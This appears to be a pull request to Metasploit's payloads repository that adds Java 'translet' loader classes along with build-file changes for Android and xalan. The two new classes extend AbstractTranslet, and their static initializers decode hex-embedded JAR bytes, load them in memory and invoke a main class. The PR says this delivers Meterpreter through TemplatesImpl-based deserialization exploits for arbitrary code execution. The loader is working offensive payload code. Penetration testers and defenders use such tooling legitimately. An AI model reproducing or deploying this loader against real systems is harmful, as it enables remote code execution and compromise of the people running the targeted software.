### PR TITLE
Meterpreter Translet Loader

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -1,6 +1,7 @@
 DATADIR:=../metasploit-framework/data
 METERPDIR:=$(DATADIR)/meterpreter
 ANDROIDSDKDIR:=/usr/local/share/android-sdk
+DXPATH:=platforms/android-3/tools
 
 install-all: \
 	install-windows \
@@ -38,7 +39,7 @@ install-python: $(METERPDIR)
 install-android:
 	@echo "Installing Android payloads"
 	@mvn -v >/dev/null 2>&1 || echo "Note: Maven not found, skipping";
-	@mvn -v >/dev/null 2>&1 && (cd java; mvn package -Dandroid.sdk.path=$(ANDROIDSDKDIR) -Dandroid.release=true -P deploy -q);
+	@mvn -v >/dev/null 2>&1 && (cd java; mvn package -Dandroid.sdk.path=$(ANDROIDSDKDIR) -Ddx.path=$(ANDROIDSDKDIR)/$(DXPATH) -Dandroid.release=true -P deploy -q);
 
 uninstall:
 	rm -fr $(METERPDIR)

--- a/java/androidpayload/library/pom.xml
+++ b/java/androidpayload/library/pom.xml
@@ -8,7 +8,8 @@
 	<name>Android Meterpreter</name>
 
 	<properties>
-		<deploy.path>../../metasploit-framework</deploy.path>
+					<deploy.path>../../metasploit-framework</deploy.path>
+					<dx.path>${android.sdk.path}/platforms/android-3/tools/</dx.path>
 	</properties>
 	<dependencies>
 		<dependency>
@@ -116,7 +117,7 @@
 											<zipfileset src="${com.metasploit:Metasploit-JavaPayload:jar}" includes="javapayload/stage/StreamForwarder.class" />
 											<zipfileset src="${com.metasploit:Metasploit-JavaPayload:jar}" includes="javapayload/stage/Stage.class" />
 										</copy>
-										<exec executable="${android.sdk.path}/platforms/android-3/tools/${dx.filename}" failonerror="true">
+										<exec executable="${dx.path}/${dx.filename}" failonerror="true">
 											<arg value="--verbose" />
 											<arg value="--dex" />
 											<arg value="--output=${project.basedir}/../../${deploy.path}/data/android/shell.jar" />
@@ -131,7 +132,7 @@
 											</fileset>
 											<zipfileset src="${com.metasploit:Metasploit-JavaPayload:jar}" includes="javapayload/stage/Stage.class" />
 										</copy>
-										<exec executable="${android.sdk.path}/platforms/android-3/tools/${dx.filename}" failonerror="true">
+										<exec executable="${dx.path}/${dx.filename}" failonerror="true">
 											<arg value="--verbose" />
 											<arg value="--dex" />
 											<arg value="--output=${project.basedir}/../../${deploy.path}/data/android/metstage.jar" />
@@ -145,7 +146,7 @@
 												<include name="com/metasploit/meterpreter/**/*.class" />
 											</fileset>
 										</copy>
-										<exec executable="${android.sdk.path}/platforms/android-3/tools/${dx.filename}" failonerror="true">
+										<exec executable="${dx.path}/${dx.filename}" failonerror="true">
 											<arg value="--verbose" />
 											<arg value="--dex" />
 											<arg value="--output=${project.basedir}/../../${deploy.path}/data/android/meterpreter.jar" />
@@ -156,7 +157,7 @@
 										</exec>
 
 										<echo>Building stageless meterpreter</echo>
-										<exec executable="${android.sdk.path}/platforms/android-3/tools/${dx.filename}" failonerror="true">
+										<exec executable="${dx.path}/${dx.filename}" failonerror="true">
 											<arg value="--verbose" />
 											<arg value="--dex" />
 											<arg value="--output=${project.basedir}/../../${deploy.path}/data/android/meterpreter.dex" />

--- a/java/javapayload/pom.xml
+++ b/java/javapayload/pom.xml
@@ -21,6 +21,7 @@
 			<groupId>xalan</groupId>
 			<artifactId>xalan</artifactId>
 			<version>2.7.2</version>
+			<scope>provided</scope>
 			<exclusions>
 				<exclusion>
   				<groupId>xml-apis</groupId>

--- a/java/javapayload/pom.xml
+++ b/java/javapayload/pom.xml
@@ -17,6 +17,11 @@
 			<artifactId>servlet-api</artifactId>
 			<version>2.2</version>
 		</dependency>
+		<dependency>
+			<groupId>xalan</groupId>
+			<artifactId>xalan</artifactId>
+			<version>2.7.2</version>
+		</dependency>
 	</dependencies>
 	<profiles>
 		<profile>

--- a/java/javapayload/pom.xml
+++ b/java/javapayload/pom.xml
@@ -21,6 +21,12 @@
 			<groupId>xalan</groupId>
 			<artifactId>xalan</artifactId>
 			<version>2.7.2</version>
+			<exclusions>
+				<exclusion>
+  				<groupId>xml-apis</groupId>
+	  			<artifactId>xml-apis</artifactId>
+				</exclusion>
+			</exclusions>
 		</dependency>
 	</dependencies>
 	<profiles>

--- a/java/javapayload/src/main/java/metasploit/TransletPayload.java
+++ b/java/javapayload/src/main/java/metasploit/TransletPayload.java
@@ -1,0 +1,51 @@
+package metasploit;
+
+import java.io.ByteArrayOutputStream;
+import java.lang.reflect.Method;
+import java.net.URL;
+import java.net.URLClassLoader;
+import com.metasploit.meterpreter.MemoryBufferURLConnection;
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+
+@SuppressWarnings("restriction")
+public class TransletPayload extends AbstractTranslet {
+	
+	public static String MAIN_CLASS = "<MAINCLASS>";
+
+	static {
+		try {
+			String[] ps = payload();
+			ByteArrayOutputStream bos = new ByteArrayOutputStream();
+			for (String part : ps) {
+				for ( int i = 0; i < part.length()-1; i+=2)
+				bos.write( (byte)Short.parseShort(part.substring(i, i+2), 16) );
+			}
+			URL u = MemoryBufferURLConnection.createURL(bos.toByteArray(), "application/jar");
+			
+			@SuppressWarnings("resource")
+			URLClassLoader uc = new URLClassLoader(new URL[] { u }, TransletPayload.class.getClassLoader());
+			Class<?> lc = uc.loadClass(MAIN_CLASS);
+			Method dc = lc.getDeclaredMethod("main", String[].class);
+			dc.invoke(null, new Object[] { new String[0] } );
+		} catch (Exception e) { }
+	}
+	
+	private static String[] payload() {
+		return new String[0];
+	}
+
+	public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+	}
+
+	
+
+	@Override
+	public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler)
+			throws TransletException {
+	}
+
+}

--- a/java/javapayload/src/main/java/metasploit/TransletXalanPayload.java
+++ b/java/javapayload/src/main/java/metasploit/TransletXalanPayload.java
@@ -1,0 +1,51 @@
+package metasploit;
+
+import java.io.ByteArrayOutputStream;
+import java.lang.reflect.Method;
+import java.net.URL;
+import java.net.URLClassLoader;
+import com.metasploit.meterpreter.MemoryBufferURLConnection;
+import org.apache.xalan.xsltc.DOM;
+import org.apache.xalan.xsltc.TransletException;
+import org.apache.xalan.xsltc.runtime.AbstractTranslet;
+import org.apache.xml.dtm.DTMAxisIterator;
+import org.apache.xml.serializer.SerializationHandler;
+
+@SuppressWarnings("restriction")
+public class TransletXalanPayload extends AbstractTranslet {
+	
+	public static String MAIN_CLASS = "<MAINCLASS>";
+
+	static {
+		try {
+			String[] ps = payload();
+			ByteArrayOutputStream bos = new ByteArrayOutputStream();
+			for (String part : ps) {
+				for ( int i = 0; i < part.length()-1; i+=2)
+				bos.write( (byte)Short.parseShort(part.substring(i, i+2), 16) );
+			}
+			URL u = MemoryBufferURLConnection.createURL(bos.toByteArray(), "application/jar");
+			
+			@SuppressWarnings("resource")
+			URLClassLoader uc = new URLClassLoader(new URL[] { u }, TransletPayload.class.getClassLoader());
+			Class<?> lc = uc.loadClass(MAIN_CLASS);
+			Method dc = lc.getDeclaredMethod("main", String[].class);
+			dc.invoke(null, new Object[] { new String[0] } );
+		} catch (Exception e) { }
+	}
+	
+	private static String[] payload() {
+		return new String[0];
+	}
+
+	public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+	}
+
+	
+
+	@Override
+	public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler)
+			throws TransletException {
+	}
+
+}

--- a/java/version-compatibility-check/android-api/pom.xml
+++ b/java/version-compatibility-check/android-api/pom.xml
@@ -76,6 +76,9 @@
 								<artifactId>android-api-level-L</artifactId>
 								<version>L_r1</version>
 							</signature>
+							<ignores>
+									<ignore>com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet</ignore>
+							</ignores>
 						</configuration>
 					</execution>
 				</executions>

--- a/java/version-compatibility-check/android-api/pom.xml
+++ b/java/version-compatibility-check/android-api/pom.xml
@@ -77,7 +77,8 @@
 								<version>L_r1</version>
 							</signature>
 							<ignores>
-									<ignore>com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet</ignore>
+                <ignore>com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet</ignore>
+                <ignore>java.awt.Robot</ignore>
 							</ignores>
 						</configuration>
 					</execution>

--- a/java/version-compatibility-check/java15/pom.xml
+++ b/java/version-compatibility-check/java15/pom.xml
@@ -50,6 +50,9 @@
 								<artifactId>java15</artifactId>
 								<version>1.0</version>
 							</signature>
+							<ignores>
+									<ignore>com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet</ignore>
+							</ignores>
 						</configuration>
 					</execution>
 				</executions>

--- a/java/version-compatibility-check/java16/pom.xml
+++ b/java/version-compatibility-check/java16/pom.xml
@@ -54,6 +54,9 @@
 								<artifactId>java16</artifactId>
 								<version>1.0</version>
 							</signature>
+							<ignores>
+									<ignore>com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet</ignore>
+							</ignores>
 						</configuration>
 					</execution>
 				</executions>

--- a/java/version-compatibility-check/pom.xml
+++ b/java/version-compatibility-check/pom.xml
@@ -17,6 +17,11 @@
 			<artifactId>servlet-api</artifactId>
 			<version>2.2</version>
 		</dependency>
+		<dependency>
+			<groupId>xalan</groupId>
+			<artifactId>xalan</artifactId>
+			<version>2.7.2</version>
+		</dependency>
 	</dependencies>
 	<build>
 		<pluginManagement>


### PR DESCRIPTION
Previous discussion in: https://github.com/rapid7/metasploit-framework/issues/11748

This adds a meterpreter loader working around the limitations of JDK/Xalan's TemplatesImpl bytecode loading, a class commonly used in deserialization exploits to achieve arbitrary code execution. This is achieved by embedding and loading JAR file content into the class.

The code that patches the loader class to contain the actual meterpreter classes and config is currently located in the metasploit-framework part of these patches. Would you prefer moving this to the metasploit-payloads gem?
